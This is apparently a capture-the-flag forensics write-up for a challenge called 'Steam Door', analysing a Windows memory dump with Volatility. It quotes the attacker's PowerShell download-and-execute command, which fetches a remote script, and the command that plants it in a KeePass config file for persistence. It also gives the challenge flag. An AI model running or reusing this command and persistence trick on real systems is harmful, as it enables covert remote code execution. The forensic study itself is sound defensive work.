Steam Door
Steam-security analysts have spotted a new unknown persistence technique used in the wild. But they are not able to understand how it works since steam-technology is involving at very fast rates. Please analyse this memory dump and find the persistence mechanism used by the malicious steam actors.
Flag format: HTB{md5sum }. For example: HTB{55e7dd3016ce4ac57b9a0f56af12f7c2}
Download: drive.google.com/file/d/1OP_r3c9Crvym28suH9K7ro5JNN0Pzx5_
Category: Forensics
Solver: lmarschk, mp455
Flag: HTB{db042f659831045cc3748324b481507e}
Writeup
Summary: Analysis of windows memory dump and file extraction out of it.
We got a memory dump steam.raw. Using volatility 2.6.1 we analyse the memory in multiple directions. For example:
-
imageinfo: Windows Profile Win7SP1x86_23418
-
pstree:
Name Pid PPid Thds Hnds Time -------------------------------------------------- ------ ------ ------ ------ ---- . 0x85169698:KeePass.exe 2756 3344 10 229 2022-03-01 12:17:23 UTC+0000 .. 0x85b31358:powershell.exe 188 2756 13 335 2022-03-01 12:17:34 UTC+0000 -
cmdline -p 188:
Command line : "C:\windows\system32\Windowspowershell\v1.0\powershell.exe" -c iex (new-object net.webclient).downloadstring('https://windowsliveupdater.com/backup.ps1') -
cmdscan:
Cmd #0 @ 0x257f78: dir downloads Cmd #1 @ 0x257fa0: cd downloads Cmd #2 @ 0x264680: .\download.exe -t keepass -c "C:\windows\system32\Windowspowershell\v1.0\powershell.exe" -a "-c iex (new-object net.webclient).downloadstring('https://windowsliveupdater.com/backup.ps1')" -f C:\Users\steam_mngr\AppData\Roaming\KeePass\KeePass.config.xml -m add
This information already tells us a story. At some point in the past someone executed the download.exe with a command -c, their argument -a, a KeePass config file -f, a mode -m and a type -t. Then at the point of the memory dump KeePass was running with a powershell subprocess that is executing the mentioned argument -a. Now we can assume a story based on that: An attacker had access to this computer, downloaded the command injection tool download.exe and executed it in the KeePass mode so that the powershell command -a is injected in the KeePass.config.xml so that it is running when KeePass is running.
As we cannot find further information about the backup.ps1 let’s try to find the KeePass.config.xml. While volatilities dumpfiles plugin cannot find the file by default, the filescan plugin can.
0x000000003ef7ed58 8 0 R--r-- \Device\HarddiskVolume1\Users\steam_mngr\AppData\Roaming\KeePass\KeePass.config.xml
Having this offset dumpfiles can dump the file via dumpfiles -Q 0x000000003ef7ed58. This way we get the manipulated KeePass config file and find a section containing the powershell payload. We can now calculate the md5sum of the config file (Do not remove any of the many null bytes at the end of the file!) and get the Flag: HTB{db042f659831045cc3748324b481507e}